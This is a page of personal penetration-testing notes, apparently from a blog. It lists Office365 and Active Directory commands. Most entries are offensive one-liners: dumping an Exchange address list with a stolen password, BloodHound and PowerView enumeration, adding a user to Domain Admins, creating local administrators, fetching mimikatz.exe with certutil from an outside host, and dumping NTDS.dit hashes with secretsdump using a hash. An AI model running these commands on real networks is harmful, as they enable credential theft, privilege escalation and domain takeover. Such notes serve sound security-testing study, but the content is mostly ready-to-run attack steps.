I"~#<p>Compilation of personal notes</p>

<h1 id="office365owa-mailsniper---httpwwwdafthackcomfilesmailsniper-field-manualpdf">Office365/OWA (MailSniper) - http://www.dafthack.com/files/MailSniper-Field-Manual.pdf</h1>

<h2 id="dump-e-mail-accounts-after-first-account-compromise">Dump e-mail accounts after first account compromise</h2>
<p><code class="highlighter-rouge">$ Import-Module MailSniper.ps1</code>
<code class="highlighter-rouge">$ Get-GlobalAddressList -ExchHostname outlook.office365.com -UserName username@domain.com.br -Password Spring2017 -OutFile global-address-list.txt</code></p>

<h1 id="ad-and-powershell">AD and Powershell</h1>

<h2 id="powershell-mode">Powershell mode</h2>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">powershell</span><span class="w"> </span><span class="nt">-Command</span><span class="w"> </span><span class="s2">"</span><span class="bp">$ExecutionContext</span><span class="s2">.SessionState.LanguageMode"</span><span class="err">`</span><span class="w">
</span></code></pre></div></div>

<h2 id="restore-deleted-objects-from-recycle-bin">Restore deleted objects from Recycle Bin</h2>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># 1. Check if the feature is enabled</span><span class="w">
</span><span class="err">`</span><span class="nf">Get-ADOptionalFeature</span><span class="w"> </span><span class="err">“</span><span class="nx">Recycle</span><span class="w"> </span><span class="nx">Bin</span><span class="w"> </span><span class="nx">Feature</span><span class="err">”</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="nf">select-object</span><span class="w"> </span><span class="nx">name</span><span class="p">,</span><span class="w"> </span><span class="nx">EnabledScopes</span><span class="err">`</span><span class="w">
</span><span class="c"># 2. Retrieve AD Object and restore it</span><span class="w">
</span><span class="err">`</span><span class="nf">Get-ADObject</span><span class="w"> </span><span class="nt">-Filter</span><span class="w"> </span><span class="err">‘</span><span class="nx">sAMAccountName</span><span class="w"> </span><span class="o">-eq</span><span class="w"> </span><span class="err">“</span><span class="nx">DeletedAdmin</span><span class="err">”’</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="nf">Restore-ADObject</span><span class="err">`</span><span class="w">
</span></code></pre></div></div>

<h2 id="check-user-acls">Check user ACLs</h2>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">(</span><span class="nf">Get-ACL</span><span class="w"> </span><span class="s2">"AD:</span><span class="si">$(</span><span class="p">(</span><span class="nf">Get-ADUser</span><span class="w"> </span><span class="nx">myaccount</span><span class="p">)</span><span class="o">.</span><span class="nf">distinguishedname</span><span class="p">)</span><span class="s2">").access</span><span class="se">`</span><span class="s2">
</span></code></pre></div></div>

<h2 id="invoke-bloodhound---httpshunter2gitbookiodarthsidiousenumerationbloodhound">Invoke-bloodhound - https://hunter2.gitbook.io/darthsidious/enumeration/bloodhound</h2>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">Invoke-Bloodhound</span><span class="w"> </span><span class="nt">-CollectionMethod</span><span class="w"> </span><span class="nx">All</span><span class="w"> </span><span class="nt">-Compress</span><span class="err">`</span><span class="w">
</span></code></pre></div></div>

<h2 id="check-password-policy-for-lockouts">Check password policy for lockouts</h2>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>net accounts
</code></pre></div></div>

<h2 id="get-current-domain-and-domain-controller">Get current domain and domain controller</h2>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[</span><span class="no">System.DirectoryServices.ActiveDirectory.</span><span class="kt">Domain</span><span class="p">]</span><span class="o">.</span><span class="nf">GetCurrentDomain</span><span class="p">()</span><span class="w">
</span></code></pre></div></div>

<h2 id="search-logged-on-users-from-domain-joined-computer">Search logged on users (From domain joined computer)</h2>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">Import-Module</span><span class="w"> </span><span class="o">.</span><span class="nx">\PowerView.ps1</span><span class="w">
</span><span class="nf">Get-NetLoggedon</span><span class="w"> </span><span class="nt">-ComputerName</span><span class="w"> </span><span class="nx">client123</span><span class="w"> </span><span class="c"># -Server dc01.corp</span><span class="w">
</span><span class="nf">Get-NetSession</span><span class="w"> </span><span class="nt">-ComputerName</span><span class="w"> </span><span class="nx">dc01</span><span class="w">
</span></code></pre></div></div>

<h2 id="list-domain-users">List domain users</h2>
<p><code class="highlighter-rouge">$ net user /domain</code>
<code class="highlighter-rouge">$ Get-ADUser</code></p>

<h2 id="powershell-prompt-in-domain-context-useful-for-bloodhound-ingestor-from-outside-a-domain-joined-box-or-querying-stuff-in-ad">Powershell prompt in domain context (Useful for bloodhound ingestor from outside a domain-joined box or querying stuff in AD)</h2>
<p><code class="highlighter-rouge">$ runas /netonly /user:domain\user powershell</code></p>

<h2 id="all-groups-that-the-user-belongs-to">All Groups that the user belongs to</h2>
<p><code class="highlighter-rouge">$ Get-ADPrincipalGroupMembership user | Select name</code></p>

<h2 id="adding-domain-user-need-rsat-module">Adding domain user (Need RSAT module)</h2>
<p><code class="highlighter-rouge">$ New-ADUser -Name “Satinha da Silva” -Samusername “sata.silva” -Enabled $True</code>
<code class="highlighter-rouge">$ Add-ADGroupMember -Identity “Domain Admin” -Members “satinha”</code></p>

<h2 id="creating-local-user">Creating local user</h2>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">$</span><span class="w"> </span><span class="nf">Password</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nf">Read-Host</span><span class="w"> </span><span class="nt">-AsSecureString</span><span class="w">
</span><span class="err">$</span><span class="w"> </span><span class="nf">New-LocalUser</span><span class="w"> </span><span class="s2">"User03"</span><span class="w"> </span><span class="nt">-Password</span><span class="w"> </span><span class="nv">$Password</span><span class="w"> </span><span class="nt">-FullName</span><span class="w"> </span><span class="s2">"Third User"</span><span class="w"> </span><span class="nt">-Description</span><span class="w"> </span><span class="s2">"Description of this account."</span><span class="w">
</span><span class="c">## cmd.exe</span><span class="w">
</span><span class="err">$</span><span class="w"> </span><span class="nf">net</span><span class="w"> </span><span class="nx">user</span><span class="w"> </span><span class="nx">username</span><span class="w"> </span><span class="nx">password</span><span class="w"> </span><span class="nx">/add</span><span class="w">
</span><span class="err">$</span><span class="w"> </span><span class="nf">net</span><span class="w"> </span><span class="nx">localgroup</span><span class="w"> </span><span class="nx">Administrators</span><span class="w"> </span><span class="nx">username</span><span class="w"> </span><span class="nx">/add</span><span class="w">
</span></code></pre></div></div>

<h2 id="download-files-from-windows">Download files from windows</h2>
<p><code class="highlighter-rouge">$ certutil.exe -urlcache -split -f http://10.10.10.10/mimikatz.exe mimikatz.exe</code>
<code class="highlighter-rouge">$ IWR -Uri http://asdasd.com.br/file.exe -Outfile file.exe # (Invoke-WebRequest)</code></p>

<h2 id="remote-dump-ntdsdit-file">Remote dump ntds.dit file</h2>
<p><code class="highlighter-rouge">$ secretsdump.py -just-dc-ntlm domain/user@dc-name.corp 43ad9d72b6fad288056f81166418c3bf</code></p>

<h2 id="object-properties">Object properties</h2>
<p><code class="highlighter-rouge">$ Get-ADObject -SearchBase "DC=corp,DC=local" -filter 'SamAccountName -eq "admin"' -property *</code></p>

<h2 id="enumerate-ldap-distingued-names">Enumerate LDAP distingued names</h2>
<p><code class="highlighter-rouge">$ ldapsearch -x -h dc-01.corp.local -s base namingcontexts</code></p>

<h2 id="dump-ldap">Dump LDAP</h2>
<p><code class="highlighter-rouge">$ ldapsearch -x -h dc-01.corp.local -b 'DC=corp,DC=local'</code></p>
:ET